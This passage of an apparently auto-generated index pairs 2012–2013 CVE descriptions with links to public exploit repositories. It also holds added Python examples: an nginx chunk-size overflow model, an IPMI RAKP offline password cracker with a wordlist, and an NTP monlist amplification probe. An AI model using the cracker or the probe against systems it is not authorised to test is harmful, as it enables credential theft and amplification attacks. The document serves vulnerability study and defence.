The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, 5.0 Update 41 and earlier, and JavaFX 2.2.7 and earlier allows remote attackers to execute arbitrary code via vectors related to 2D, as demonstrated by Joshua Drake during a Pwn2Own competition at CanSecWest 2013.

- [guhe120/CVE20131491-JIT](https://github.com/guhe120/CVE20131491-JIT)

### CVE-2013-1690 (2013-06-26)

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.

- [vlad902/annotated-fbi-tbb-exploit](https://github.com/vlad902/annotated-fbi-tbb-exploit)

### CVE-2013-1763 (2013-02-28)

Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.

- [qkrtjsrbs315/CVE-2013-1763](https://github.com/qkrtjsrbs315/CVE-2013-1763)

### CVE-2013-1775 (2013-03-04)

sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.

- [bekhzod0725/perl-CVE-2013-1775](https://github.com/bekhzod0725/perl-CVE-2013-1775)

### CVE-2013-1965 (2013-07-10)

Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.

- [cinno/CVE-2013-1965](https://github.com/cinno/CVE-2013-1965)

### CVE-2013-2006 (2013-05-21)

OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode logging is enabled, logs the (1) admin_token and (2) LDAP password in plaintext, which allows local users to obtain sensitive information by reading the log file.

- [LogSec/CVE-2013-2006](https://github.com/LogSec/CVE-2013-2006)

### CVE-2013-2028 (2013-07-18)

The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.

- [danghvu/nginx-1.4.0](https://github.com/danghvu/nginx-1.4.0)
- [kitctf/nginxpwn](https://github.com/kitctf/nginxpwn)
- [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://github.com/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC)
- [m4drat/CVE-2013-2028-Exploit](https://github.com/m4drat/CVE-2013-2028-Exploit)
- [jptr218/nginxhack](https://github.com/jptr218/nginxhack)
- [Sunqiz/CVE-2013-2028-reproduction](https://github.com/Sunqiz/CVE-2013-2028-reproduction)
- [xiw1ll/CVE-2013-2028_Checker](https://github.com/xiw1ll/CVE-2013-2028_Checker)
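The integer signedness error in the description is easy to see once the arithmetic is written out. The block below is an added example and not nginx source or any of the repositories above: it models the affected accumulation (`size = size * 16 + digit` into a signed 64-bit `off_t`), shows how a 16-digit hex chunk size wraps negative and how `ngx_min(size, buffer_len)` cast to `size_t` becomes a huge `recv()` length against a fixed buffer, and places the hardened parse beside it. The 4096-byte discard buffer and the 64-bit signed width are assumptions matching common builds.

```python
"""Chunk-size arithmetic behind CVE-2013-2028, vulnerable and hardened.
Added example; it is a model, not nginx code."""
MASK64 = (1 << 64) - 1
INT64_MAX = (1 << 63) - 1
DISCARD_BUFFER_SIZE = 4096  # assumed NGX_HTTP_DISCARD_BUFFER_SIZE


def to_int64(value: int) -> int:
    """Two's-complement wrap of a Python int into a signed 64-bit off_t."""
    value &= MASK64
    return value - (1 << 64) if value > INT64_MAX else value


def _hex_digits(line: bytes) -> bytes:
    """Take the chunk-size token up to ';' (chunk extension) or CR."""
    out = bytearray()
    for b in line:
        if b in b";\r":
            break
        if b not in b"0123456789abcdefABCDEF":
            raise ValueError("invalid chunk size character")
        out.append(b)
    if not out:
        raise ValueError("empty chunk size")
    return bytes(out)


def parse_chunk_size_vulnerable(line: bytes) -> int:
    """Accumulate like the affected code: the 16th hex digit overflows the
    signed field and the size silently turns negative."""
    size = 0
    for b in _hex_digits(line):
        size = to_int64(size * 16 + int(chr(b), 16))
    return size


def parse_chunk_size_fixed(line: bytes) -> int:
    """Reject before the multiply can overflow, so a negative size can never
    reach the length computation (nginx 1.4.1 added the equivalent
    'size < 0 -> invalid' check after the loop)."""
    size = 0
    for b in _hex_digits(line):
        if size > INT64_MAX // 16:
            raise ValueError("chunk size overflows off_t")
        size = size * 16 + int(chr(b), 16)
    return size


def recv_length(chunk_size: int, buffer_len: int = DISCARD_BUFFER_SIZE) -> int:
    """What ngx_min(size, buffer_len) cast to size_t hands to recv(): a
    negative size wins the min() and then becomes a huge unsigned length."""
    n = min(chunk_size, buffer_len)
    return n & MASK64
```

A request with `Transfer-Encoding: chunked` and a first chunk line of `ffffffffffffffff` is therefore the signature to look for in traffic captures; the hardened parser rejects it at the last digit.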

### CVE-2013-2072 (2013-08-28)

Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen 4.0.x, 4.1.x, and 4.2.x allows local administrators with permissions to configure VCPU affinity to cause a denial of service (memory corruption and xend toolstack crash) and possibly gain privileges via a crafted cpumap.

- [bl4ck5un/cve-2013-2072](https://github.com/bl4ck5un/cve-2013-2072)

### CVE-2013-2094 (2013-05-14)

The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.

- [realtalk/cve-2013-2094](https://github.com/realtalk/cve-2013-2094)
- [hiikezoe/libperf_event_exploit](https://github.com/hiikezoe/libperf_event_exploit)
- [Pashkela/CVE-2013-2094](https://github.com/Pashkela/CVE-2013-2094)
- [tarunyadav/fix-cve-2013-2094](https://github.com/tarunyadav/fix-cve-2013-2094)
- [timhsutw/cve-2013-2094](https://github.com/timhsutw/cve-2013-2094)
- [vnik5287/CVE-2013-2094](https://github.com/vnik5287/CVE-2013-2094)

### CVE-2013-2165 (2013-07-22)

ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementation in Red Hat JBoss Web Framework Kit before 2.3.0, Red Hat JBoss Web Platform through 5.2.0, Red Hat JBoss Enterprise Application Platform through 4.3.0 CP10 and 5.x through 5.2.0, Red Hat JBoss BRMS through 5.3.1, Red Hat JBoss SOA Platform through 4.3.0 CP05 and 5.x through 5.3.1, Red Hat JBoss Portal through 4.3 CP07 and 5.x through 5.2.2, and Red Hat JBoss Operations Network through 2.4.2 and 3.x through 3.1.2 does not restrict the classes for which deserialization methods can be called, which allows remote attackers to execute arbitrary code via crafted serialized data.

- [Pastea/CVE-2013-2165](https://github.com/Pastea/CVE-2013-2165)

### CVE-2013-2171 (2013-07-02)

The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.

- [0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation](https://github.com/0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation)

### CVE-2013-2186 (2013-10-28)

The DiskFileItem class in Apache Commons FileUpload, as used in Red Hat JBoss BRMS 5.3.1; JBoss Portal 4.3 CP07, 5.2.2, and 6.0.0; and Red Hat JBoss Web Server 1.0.2 allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance.

- [GrrrDog/ACEDcup](https://github.com/GrrrDog/ACEDcup)
- [sa1g0n1337/Payload_CVE_2013_2186](https://github.com/sa1g0n1337/Payload_CVE_2013_2186)
- [sa1g0n1337/CVE_2013_2186](https://github.com/sa1g0n1337/CVE_2013_2186)

### CVE-2013-2217 (2013-09-23)

cache.py in Suds 0.4, when tempdir is set to None, allows local users to redirect SOAP queries and possibly have other unspecified impact via a symlink attack on a cache file with a predictable name in /tmp/suds/.

- [Osirium/suds](https://github.com/Osirium/suds)

### CVE-2013-2251 (2013-07-18)

Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

- [nth347/CVE-2013-2251](https://github.com/nth347/CVE-2013-2251)

### CVE-2013-2595 (2014-08-31)

The device-initialization functionality in the MSM camera driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, enables MSM_CAM_IOCTL_SET_MEM_MAP_INFO ioctl calls for an unrestricted mmap interface, which allows attackers to gain privileges via a crafted application.

- [fi01/libmsm_cameraconfig_exploit](https://github.com/fi01/libmsm_cameraconfig_exploit)

### CVE-2013-2596 (2013-04-13)

Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux kernel before 3.8.9, as used in a certain Motorola build of Android 4.1.2 and other products, allows local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted /dev/graphics/fb0 mmap2 system calls, as demonstrated by the Motochopper pwn program.

- [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit)

### CVE-2013-2597 (2014-08-31)

Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c in the acdb audio driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via an application that leverages /dev/msm_acdb access and provides a large size value in an ioctl argument.

- [fi01/libmsm_acdb_exploit](https://github.com/fi01/libmsm_acdb_exploit)

### CVE-2013-2729 (2013-05-16)

Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727.

- [feliam/CVE-2013-2729](https://github.com/feliam/CVE-2013-2729)

### CVE-2013-2730 (2013-05-16)

Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2733.

- [feliam/CVE-2013-2730](https://github.com/feliam/CVE-2013-2730)

### CVE-2013-2842 (2013-05-22)

Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the handling of widgets.

- [173210/spider](https://github.com/173210/spider)

### CVE-2013-2977 (2013-05-10)

Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and 9.x before 9.0 Interim Fix 1 on Windows, and 8.5.x before 8.5.3 FP5 and 9.x before 9.0.1 on Linux, allows remote attackers to execute arbitrary code via a malformed PNG image in a previewed e-mail message, aka SPR NPEI96K82Q.

- [defrancescojp/CVE-2013-2977](https://github.com/defrancescojp/CVE-2013-2977)

### CVE-2013-3214 (2020-01-28)

vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'.

- [shadofren/CVE-2013-3214](https://github.com/shadofren/CVE-2013-3214)

### CVE-2013-3319 (2013-08-16)

The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128.

- [devoteam-cybertrust/cve-2013-3319](https://github.com/devoteam-cybertrust/cve-2013-3319)

### CVE-2013-3651 (2013-06-29)

LOCKON EC-CUBE 2.11.2 through 2.12.4 allows remote attackers to conduct unspecified PHP code-injection attacks via a crafted string, related to data/class/SC_CheckError.php and data/class/SC_FormParam.php.

- [motikan2010/CVE-2013-3651](https://github.com/motikan2010/CVE-2013-3651)

### CVE-2013-3660 (2013-05-24)

The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability."

- [ExploitCN/CVE-2013-3660-x64-WIN7](https://github.com/ExploitCN/CVE-2013-3660-x64-WIN7)

### CVE-2013-3664 (2014-07-01)

Trimble SketchUp (formerly Google SketchUp) before 2013 (13.0.3689) allows remote attackers to execute arbitrary code via a crafted color palette table in a MAC Pict texture, which triggers an out-of-bounds stack write. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-3662. NOTE: this issue was SPLIT due to different affected products and codebases (ADT1); CVE-2013-7388 has been assigned to the paintlib issue.

- [defrancescojp/CVE-2013-3664_MAC](https://github.com/defrancescojp/CVE-2013-3664_MAC)
- [defrancescojp/CVE-2013-3664_BMP](https://github.com/defrancescojp/CVE-2013-3664_BMP)

### CVE-2013-3827 (2013-10-16)

Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.

- [thistehneisen/CVE-2013-3827](https://github.com/thistehneisen/CVE-2013-3827)

### CVE-2013-3900 (2013-12-11)

The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

- [snoopopsec/vulnerability-CVE-2013-3900](https://github.com/snoopopsec/vulnerability-CVE-2013-3900)
- [CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln](https://github.com/CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln)
- [Securenetology/CVE-2013-3900](https://github.com/Securenetology/CVE-2013-3900)
- [OtisSymbos/CVE-2013-3900-WinTrustVerify](https://github.com/OtisSymbos/CVE-2013-3900-WinTrustVerify)

### CVE-2013-4002 (2013-07-23)

XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.

- [tafamace/CVE-2013-4002](https://github.com/tafamace/CVE-2013-4002)

### CVE-2013-4175 (2020-01-23)

MySecureShell 1.31 has a local denial of service vulnerability.

- [hartwork/mysecureshell-issues](https://github.com/hartwork/mysecureshell-issues)

### CVE-2013-4348 (2013-11-04)

The skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel through 3.12 allows remote attackers to cause a denial of service (infinite loop) via a small value in the IHL field of a packet with IPIP encapsulation.

- [bl4ck5un/cve-2013-4348](https://github.com/bl4ck5un/cve-2013-4348)

### CVE-2013-4362 (2013-09-30)

WEB-DAV Linux File System (davfs2) 1.4.6 and 1.4.7 allow local users to gain privileges via unknown attack vectors in (1) kernel_interface.c and (2) mount_davfs.c, related to the "system" function.

- [notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation](https://github.com/notclement/Automatic-davfs2-1.4.6-1.4.7-Local-Privilege-Escalation)

### CVE-2013-4378 (2013-09-30)

Cross-site scripting (XSS) vulnerability in HtmlSessionInformationsReport.java in JavaMelody 1.46 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted X-Forwarded-For header.

- [theratpack/grails-javamelody-sample-app](https://github.com/theratpack/grails-javamelody-sample-app)
- [epicosy/VUL4J-50](https://github.com/epicosy/VUL4J-50)

### CVE-2013-4434 (2013-10-25)

Dropbear SSH Server before 2013.59 generates error messages for a failed logon attempt with different time delays depending on whether the user account exists, which allows remote attackers to discover valid usernames.

- [styx00/Dropbear_CVE-2013-4434](https://github.com/styx00/Dropbear_CVE-2013-4434)

### CVE-2013-4547 (2013-11-23)

nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.

- [cyberharsh/Nginx-CVE-2013-4547](https://github.com/cyberharsh/Nginx-CVE-2013-4547)

### CVE-2013-4710 (2014-03-03)

Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.

- [Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability](https://github.com/Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability)

### CVE-2013-4730 (2014-05-15)

Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.

- [t0rt3ll1n0/PCmanBoF](https://github.com/t0rt3ll1n0/PCmanBoF)

### CVE-2013-4784 (2013-07-08)

The HP Integrated Lights-Out (iLO) BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

- [alexoslabs/ipmitest](https://github.com/alexoslabs/ipmitest)

### CVE-2013-4786 (2013-07-08)

The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.

- [fin3ss3g0d/CosmicRakp](https://github.com/fin3ss3g0d/CosmicRakp)
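What the description calls "obtaining the HMAC" is all an attacker needs, because the BMC keys the RAKP message 2 authentication code with the user's password itself. The block below is an added example, not code from the repository above: it computes that code over the fields the BMC concatenates (SID_m, SID_c, Rand_m, Rand_c, GUID_c, Role_m, ULength_m, UName_m; field order taken from the IPMI 2.0 RAKP description and the one assumption here) and runs an offline guess against it. Every sample value is constructed. IPMI stores passwords zero-padded to 16 or 20 bytes, but HMAC zero-pads short keys itself, so the padding does not change the result.

```python
"""Offline verification of an IPMI 2.0 RAKP message 2 authentication code
(CVE-2013-4786).  Added example with constructed sample values."""
import hashlib
import hmac
from typing import Iterable, Optional

# RAKP authentication algorithm numbers -> hash (RAKP-HMAC-SHA1, -MD5, -SHA256)
ALGORITHMS = {1: hashlib.sha1, 2: hashlib.md5, 3: hashlib.sha256}


def rakp2_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Concatenate the fields the BMC feeds to the HMAC (assumed order)."""
    if len(sid_m) != 4 or len(sid_c) != 4:
        raise ValueError("session IDs are 4 bytes")
    if len(rand_m) != 16 or len(rand_c) != 16 or len(guid_c) != 16:
        raise ValueError("random numbers and GUID are 16 bytes")
    return (sid_m + sid_c + rand_m + rand_c + guid_c
            + bytes([role_m, len(username)]) + username)


def rakp2_auth_code(password: bytes, salt: bytes, algorithm: int = 1) -> bytes:
    """The value the BMC sends unauthenticated in RAKP message 2."""
    return hmac.new(password, salt, ALGORITHMS[algorithm]).digest()


def guess_password(salt: bytes, observed: bytes, candidates: Iterable[bytes],
                   algorithm: int = 1) -> Optional[bytes]:
    """Try each candidate offline; no further traffic to the BMC is needed."""
    for pw in candidates:
        if hmac.compare_digest(rakp2_auth_code(pw, salt, algorithm), observed):
            return pw
    return None


def hashcat_line(salt: bytes, observed: bytes) -> str:
    """Hand-off format for a cracking tool (assumed: salt_hex:hmac_hex)."""
    return f"{salt.hex()}:{observed.hex()}"


# Constructed sample exchange (not captured from a real BMC).
SID_M = bytes.fromhex("a4a3a2a0")        # remote console session ID
SID_C = bytes.fromhex("02000000")        # managed system session ID
RAND_M = bytes(range(16))                # console random number
RAND_C = bytes(range(16, 32))            # BMC random number
GUID_C = bytes.fromhex("00112233445566778899aabbccddeeff")
ROLE_M = 0x14                            # requested privilege byte (constructed)
USERNAME = b"admin"
SALT = rakp2_salt(SID_M, SID_C, RAND_M, RAND_C, GUID_C, ROLE_M, USERNAME)
OBSERVED = rakp2_auth_code(b"P@ssw0rd", SALT)     # as the BMC would send it
WORDLIST = [b"admin", b"calvin", b"password", b"P@ssw0rd"]
```

The defensive reading is the same computation: if a BMC answers RAKP message 1 for a given username with a code at all, that username exists and its password is now subject to an offline attack, so strong BMC passwords and a management network that is not reachable from user segments are the only mitigations the protocol allows.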

### CVE-2013-5065 (2013-11-27)

NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.

- [Friarfukd/RobbinHood](https://github.com/Friarfukd/RobbinHood)

### CVE-2013-5211 (2014-01-02)

The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.

- [dani87/ntpscanner](https://github.com/dani87/ntpscanner)
- [suedadam/ntpscanner](https://github.com/suedadam/ntpscanner)
- [sepehrdaddev/ntpdos](https://github.com/sepehrdaddev/ntpdos)
- [0xhav0c/CVE-2013-5211](https://github.com/0xhav0c/CVE-2013-5211)
- [requiempentest/-exploit-check-CVE-2013-5211](https://github.com/requiempentest/-exploit-check-CVE-2013-5211)
- [requiempentest/NTP_CVE-2013-5211](https://github.com/requiempentest/NTP_CVE-2013-5211)
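The amplification the description refers to comes from an 8-byte mode 7 request that returns up to six 72-byte entries per reply packet, across many packets. The block below is an added example and not code from the scanners listed above: it builds the `MON_GETLIST_1` request (implementation XNTPD = 3, request code 42), parses the reply to list the recorded clients, and computes the amplification factor. The reply builder exists only so the parser can be exercised offline on a constructed sample; `probe()` does the live UDP exchange and is for hosts you are authorised to test.

```python
"""NTP mode 7 MON_GETLIST_1 probe, reply parser and amplification measurement
(CVE-2013-5211).  Added example; sample replies are constructed."""
import socket
import struct
from typing import List, Tuple

MODE7 = 0x17               # response=0, more=0, version 2, mode 7
IMPL_XNTPD = 3
REQ_MON_GETLIST_1 = 42
MONLIST_ITEM_SIZE = 72     # one struct info_monitor_1 on the wire
HEADER = struct.Struct(">BBBBHH")   # flags, auth/seq, impl, req, err|nitems, mbz|itemsize


def build_monlist_request() -> bytes:
    """The 8-byte probe: header with zero items."""
    return HEADER.pack(MODE7, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)


def parse_monlist_response(pkt: bytes) -> Tuple[bool, List[Tuple[str, int]]]:
    """Return (more_follows, [(client_ip, packet_count), ...])."""
    first, _seq, impl, req, err_nitems, mbz_itemsize = HEADER.unpack_from(pkt, 0)
    if (first & 0x07) != 7 or not (first & 0x80) or impl != IMPL_XNTPD or req != REQ_MON_GETLIST_1:
        raise ValueError("not a MON_GETLIST_1 response")
    if err_nitems >> 12:
        raise ValueError(f"server returned error code {err_nitems >> 12}")
    nitems, itemsize = err_nitems & 0x0FFF, mbz_itemsize & 0x0FFF
    clients = []
    for i in range(nitems):
        off = HEADER.size + i * itemsize
        # item starts with avg_int, last_int, restr, count (u32 each), then the IPv4 addr
        count = struct.unpack_from(">I", pkt, off + 12)[0]
        ip = socket.inet_ntoa(pkt[off + 16: off + 20])
        clients.append((ip, count))
    return bool(first & 0x40), clients


def amplification_factor(request: bytes, responses: List[bytes]) -> float:
    """Bytes returned per byte sent; a patched or restricted server returns nothing."""
    return sum(len(r) for r in responses) / len(request)


def build_monlist_response(clients: List[Tuple[str, int]], more: bool) -> bytes:
    """Constructed reply for offline tests, shaped like a vulnerable ntpd's."""
    first = 0x80 | (0x40 if more else 0) | MODE7
    hdr = HEADER.pack(first, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, len(clients), MONLIST_ITEM_SIZE)
    body = b"".join(
        struct.pack(">IIII", 0, 0, 0, count) + socket.inet_aton(ip) + bytes(MONLIST_ITEM_SIZE - 20)
        for ip, count in clients
    )
    return hdr + body


def probe(host: str, timeout: float = 2.0) -> List[bytes]:
    """Live check: send one request, collect every reply fragment until silence."""
    req = build_monlist_request()
    replies: List[bytes] = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, 123))
        while True:
            try:
                replies.append(s.recv(65535))
            except socket.timeout:
                break
    return replies
```

A server that answers at all is both an amplifier and an information leak (the client list is the set of hosts that recently synced with it); the fix on the server side is `disable monitor` or a `restrict default noquery` line in `ntp.conf`, and the live probe returning an empty list is how you confirm it.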

### CVE-2013-5664 (2013-08-31)

Cross-site scripting (XSS) vulnerability in the web-based device-management API browser in Palo Alto Networks PAN-OS before 4.1.13 and 5.0.x before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via crafted data, aka Ref ID 50908.

- [phusion/rails-cve-2012-5664-test](https://github.com/phusion/rails-cve-2012-5664-test)

### CVE-2013-5842 (2013-10-16)

Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5850.

- [guhe120/CVE-2013-5842](https://github.com/guhe120/CVE-2013-5842)

### CVE-2013-6117 (2014-07-11)

Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.

- [milo2012/CVE-2013-6117](https://github.com/milo2012/CVE-2013-6117)

### CVE-2013-6282 (2013-11-19)

The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013.

- [fi01/libput_user_exploit](https://github.com/fi01/libput_user_exploit)
- [fi01/libget_user_exploit](https://github.com/fi01/libget_user_exploit)
- [jeboo/bypasslkm](https://github.com/jeboo/bypasslkm)
- [timwr/CVE-2013-6282](https://github.com/timwr/CVE-2013-6282)

### CVE-2013-6375 (2013-11-23)

Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an "inverted boolean parameter."

- [bl4ck5un/cve-2013-6375](https://github.com/bl4ck5un/cve-2013-6375)

### CVE-2013-6490 (2014-02-06)

The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remote attackers to have an unspecified impact via a negative Content-Length header, which triggers a buffer overflow.

- [Everdoh/CVE-2013-6490](https://github.com/Everdoh/CVE-2013-6490)

### CVE-2013-6668 (2014-03-05)

Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, as used in Google Chrome before 33.0.1750.146, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.

- [sdneon/CveTest](https://github.com/sdneon/CveTest)

### CVE-2013-6987 (2013-12-31)

Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3 allow remote attackers to read, write, and delete arbitrary files via a .. (dot dot) in the (1) path parameter to file_delete.cgi or (2) folder_path parameter to file_share.cgi in webapi/FileStation/; (3) dlink parameter to fbdownload/; or unspecified parameters to (4) html5_upload.cgi, (5) file_download.cgi, (6) file_sharing.cgi, (7) file_MVCP.cgi, or (8) file_rename.cgi in webapi/FileStation/.

- [stoicboomer/CVE-2013-6987](https://github.com/stoicboomer/CVE-2013-6987)

## 2012
### CVE-2012-0002 (2012-03-13)

The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability."

- [zhangkaibin0921/MS12-020-CVE-2012-0002](https://github.com/zhangkaibin0921/MS12-020-CVE-2012-0002)

### CVE-2012-0003 (2012-01-10)

Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability."

- [k0keoyo/CVE-2012-0003_eXP](https://github.com/k0keoyo/CVE-2012-0003_eXP)

### CVE-2012-0056 (2012-01-27)

The mem_write function in the Linux kernel before 3.2.2, when ASLR is disabled, does not properly check permissions when writing to /proc/<pid>/mem, which allows local users to gain privileges by modifying process memory, as demonstrated by Mempodipper.

- [srclib/CVE-2012-0056](https://github.com/srclib/CVE-2012-0056)
- [pythonone/CVE-2012-0056](https://github.com/pythonone/CVE-2012-0056)

### CVE-2012-0152 (2012-03-13)

The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability."

- [rutvijjethwa/RDP_jammer](https://github.com/rutvijjethwa/RDP_jammer)

### CVE-2012-0158 (2012-04-10)

